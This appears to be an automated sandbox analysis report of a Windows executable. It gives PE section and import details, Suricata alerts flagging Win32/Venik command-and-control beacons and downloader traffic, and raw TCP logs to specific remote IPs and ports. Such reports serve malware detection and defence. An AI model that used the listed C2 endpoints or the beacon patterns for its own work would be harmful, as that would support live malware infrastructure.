                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x470000x1660.text
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x4a0000x49e003e190c534eb040f106a79d3a71ee0197False0.6108357127749577data6.54120189405413IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .rsrc0x4b0000x20000x140062d5d64d04b31fa595ae5d1a3403902eFalse0.859375data7.221275945709022IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .reloc0x4d0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                    Resources

                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    AVI0x490000x1caaRIFF (little-endian) data, AVI, 92 x 76, 5.00 fps, video: RLE 8bppEnglishUnited States0.20059961842463886
                                                                                                                                    RT_CURSOR0x4acb00x134dataEnglishUnited States0.5714285714285714
                                                                                                                                    RT_GROUP_CURSOR0x4ade80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25

                                                                                                                                    Imports

                                                                                                                                    DLLImport
                                                                                                                                    MFC42.DLL
                                                                                                                                    MSVCRT.dllstrcspn
                                                                                                                                    KERNEL32.dllMultiByteToWideChar
                                                                                                                                    USER32.dllwsprintfA
                                                                                                                                    ADVAPI32.dllLookupPrivilegeValueA
                                                                                                                                    WS2_32.dllsocket
                                                                                                                                    SHLWAPI.dllPathIsDirectoryA
                                                                                                                                    ole32.dllCoSetProxyBlanket
                                                                                                                                    OLEAUT32.dllSafeArrayUnaccessData
                                                                                                                                    MSVCP60.dll?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z
                                                                                                                                    NETAPI32.dllNetbios
                                                                                                                                    KERNEL32.dllGetModuleFileNameW
                                                                                                                                    KERNEL32.dllGetModuleHandleA, LoadLibraryA, LocalAlloc, LocalFree, GetModuleFileNameA, ExitProcess

                                                                                                                                    Exports

                                                                                                                                    NameOrdinalAddress
                                                                                                                                    InputFile10x1000678b
                                                                                                                                    PrintFile20x1000443d
                                                                                                                                    WriteErrorLog30x10008645

                                                                                                                                    Possible Origin

                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States

                                                                                                                                    Network Behavior

                                                                                                                                    Suricata IDS Alerts

                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2024-12-19T15:43:57.329698+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749706107.163.56.23518530TCP
                                                                                                                                    2024-12-19T15:43:57.329698+01002812407ETPRO MALWARE Win32/Venik HTTP CnC Beacon1192.168.2.749706107.163.56.23518530TCP
                                                                                                                                    2024-12-19T15:43:57.329783+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749707107.163.56.11018530TCP
                                                                                                                                    2024-12-19T15:43:58.477678+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.749808107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:44:05.594787+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749816107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:05.594788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749817107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:05.594789+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749831116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:07.570858+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749835116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:09.594701+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749836107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:09.594868+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749834107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:11.622907+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749850116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:13.638795+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749849107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:13.638840+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749848107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:17.657602+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749869116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:17.657648+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749860107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:17.657676+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749861107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:19.604855+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749876116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:21.658723+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749874107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:21.658747+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749875107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:24.545572+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749890116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:25.829240+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749891107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:25.829314+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749889107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:29.845942+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749904116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:29.845987+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749905107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:29.846026+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749903107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:32.697810+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749918116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:33.860437+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749916107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:33.860453+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749917107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:35.942348+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749932116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:37.876350+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749931107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:37.876495+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749933107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:38.857491+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.749945107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:44:40.914476+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749948116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:41.891938+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749941107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:41.891944+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749942107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:45.786071+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749958116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:45.892187+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749955107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:45.892217+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749957107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:50.066090+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749968107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:50.066130+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749971116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:50.066134+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749970107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:52.138073+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749983116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:54.079517+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749982107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:54.079535+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749981107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:56.021161+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749996116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:44:58.095063+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749995107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:44:58.095139+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749994107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:00.168420+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750008116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:01.080211+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.750017107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:45:02.095750+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750009107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:02.095873+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750007107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:04.168789+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750022116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:06.110726+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750021107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:06.110796+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750023107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:08.217091+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750036116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:10.251760+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750034107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:10.251799+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750035107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:12.344300+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750050116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:14.376757+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750049107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:14.376788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750047107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:16.332173+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750063116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:18.501796+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750062107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:18.501812+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750061107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:21.155101+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750076116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:22.642349+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750074107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:22.642422+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750075107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:23.209488+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.750084107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:45:24.700673+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750082116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:26.782816+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750083107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:26.782873+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750081107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:30.907815+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750088107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:30.907870+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750087107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:30.907926+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750089116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:35.048602+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750090107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:35.048659+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750091116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:35.048682+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750092107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:37.254137+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750095116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:39.189229+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750094107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:39.189638+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750093107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:43.281393+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750098107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:43.281526+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750097107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:43.281550+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750099116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:45.388903+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.750103107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:45:45.581284+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750101116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:47.568847+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750100107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:47.568919+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750102107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:49.602083+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750107116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:51.582882+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750106107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:51.583048+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750105107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:55.595606+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750111107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:55.595652+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750109107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:55.595696+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750112116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:57.543920+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750115116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:45:59.505622+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750113107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:45:59.505671+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750114107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:01.546959+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750119116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:46:03.630963+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750118107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:03.631188+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750117107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:07.514473+01002812406ETPRO MALWARE Win32/Venik CnC Beacon1192.168.2.750125107.163.56.2516658TCP
                                                                                                                                    2024-12-19T15:46:07.590366+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750124116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:46:07.642525+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750122107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:07.642668+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750123107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:09.738406+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.750129116.133.8.9280TCP
                                                                                                                                    2024-12-19T15:46:11.768467+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750127107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:11.768496+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750128107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:33.781862+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750131107.163.56.23618963TCP
                                                                                                                                    2024-12-19T15:46:33.922562+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.750132107.163.56.23618963TCP

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 19, 2024 15:43:25.139002085 CET4970618530192.168.2.7107.163.56.235
                                                                                                                                    Dec 19, 2024 15:43:25.139678001 CET4970718530192.168.2.7107.163.56.110
                                                                                                                                    Dec 19, 2024 15:43:25.259524107 CET1853049706107.163.56.235192.168.2.7
                                                                                                                                    Dec 19, 2024 15:43:25.259624958 CET4970618530192.168.2.7107.163.56.235
                                                                                                                                    Dec 19, 2024 15:43:25.259949923 CET1853049707107.163.56.110192.168.2.7
                                                                                                                                    Dec 19, 2024 15:43:25.260027885 CET4970718530192.168.2.7107.163.56.110
                                                                                                                                    Dec 19, 2024 15:43:25.270073891 CET4970618530192.168.2.7107.163.56.235
                                                                                                                                    Dec 19, 2024 15:43:25.270653009 CET4970718530192.168.2.7107.163.56.110
                                                                                                                                    Dec 19, 2024 15:43:25.389642000 CET1853049706107.163.56.235192.168.2.7
                                                                                                                                    Dec 19, 2024 15:43:25.390156031 CET1853049707107.163.56.110192.168.2.7
                                                                                                                                    Dec 19, 2024 15:43:57.329698086 CET4970618530192.168.2.7107.163.56.235
                                                                                                                                    Dec 19, 2024 15:43:57.329782963 CET4970718530192.168.2.7107.163.56.110
                                                                                                                                    Dec 19, 2024 15:43:58.356725931 CET498086658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:43:58.476782084 CET665849808107.163.56.251192.168.2.7
                                                                                                                                    Dec 19, 2024 15:43:58.476898909 CET498086658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:43:58.477678061 CET498086658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:43:58.597600937 CET665849808107.163.56.251192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:01.465836048 CET4981618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.465987921 CET4981718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.585410118 CET1896349816107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:01.585464954 CET1896349817107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:01.585549116 CET4981618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.585561991 CET4981718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.585722923 CET4981618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.585844994 CET4981718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:01.706305027 CET1896349816107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:01.706320047 CET1896349817107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.254596949 CET4983180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.374200106 CET8049831116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.374547005 CET4983180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.374687910 CET4983180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.494208097 CET8049831116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.594788074 CET4981718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.594786882 CET4981618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.594789028 CET4983180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.595273018 CET4983418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.707403898 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.707803011 CET4983618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.715545893 CET1896349834107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.715744019 CET4983418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.716157913 CET4983418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.827250004 CET8049835116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.827500105 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.827575922 CET1896349836107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.827719927 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:05.827765942 CET4983618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.827950954 CET4983618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:05.835628986 CET1896349834107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.947415113 CET8049835116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:05.947550058 CET1896349836107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:07.570759058 CET8049835116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:07.570858002 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:07.574418068 CET49842443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:07.574453115 CET44349842116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:07.574520111 CET49842443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:07.584115982 CET49842443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:07.584131956 CET44349842116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.594701052 CET4983618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.594764948 CET49842443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.594867945 CET4983418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.595771074 CET4984818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.708043098 CET4984918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.715251923 CET1896349848107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.715337038 CET4984818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.715462923 CET4984818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.723378897 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.723741055 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.827555895 CET1896349849107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.827699900 CET4984918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.834042072 CET4984918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:09.834969997 CET1896349848107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.843318939 CET8049850116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.843332052 CET8049835116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.843427896 CET4983580192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.843456030 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.843630075 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:09.953705072 CET1896349849107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:09.963267088 CET8049850116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:11.622842073 CET8049850116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:11.622906923 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:11.647483110 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:11.647504091 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:11.647727966 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:11.648653030 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:11.648675919 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.589436054 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.589581013 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:13.590243101 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.593661070 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:13.638794899 CET4984918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.638839960 CET4984818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.664335012 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:13.664366961 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.664756060 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.664822102 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:13.667198896 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:13.670322895 CET4986018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.711328983 CET44349856116.133.8.92192.168.2.7
